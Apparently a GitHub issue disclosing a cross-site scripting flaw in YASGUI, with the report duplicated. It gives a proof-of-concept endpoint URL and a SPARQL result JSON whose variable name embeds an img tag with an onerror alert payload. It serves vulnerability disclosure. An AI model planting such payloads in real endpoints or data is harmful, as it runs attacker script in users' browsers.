You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The company has discovered a potential Cross-Site Scripting (XSS) vulnerability in YASGUI. The vulnerability is caused by the way YASGUI handles the SPARQL result set JSON returned by a malicious endpoint URL. Specifically, the SPARQL result set JSON can be abused to execute JavaScript code and trigger an XSS attack on the web application.
To reproduce the vulnerability, the following endpoint URL can be used:
This endpoint URL contains a payload that includes an unescaped HTML code that can be used to execute JavaScript code and trigger an XSS attack. The payload is as follows:
Same source as in #220
The company has discovered a potential Cross-Site Scripting (XSS) vulnerability in YASGUI. The vulnerability is caused by the way YASGUI handles the SPARQL result set JSON returned by a malicious endpoint URL. Specifically, the SPARQL result set JSON can be abused to execute JavaScript code and trigger an XSS attack on the web application.
To reproduce the vulnerability, the following endpoint URL can be used:
https://rtp7.ch/sparql_poc.php
This endpoint URL contains a payload that includes an unescaped HTML code that can be used to execute JavaScript code and trigger an XSS attack. The payload is as follows:
{"head":{"vars":["subs<img src=x onerror=alert('XSS') >a","pred","obj"]},"results":{"bindings":[{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#label"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#comment"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#range"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#seeAlso"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subPropertyOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Class"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#domain"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Resource"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subClassOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}}]}}The text was updated successfully, but these errors were encountered: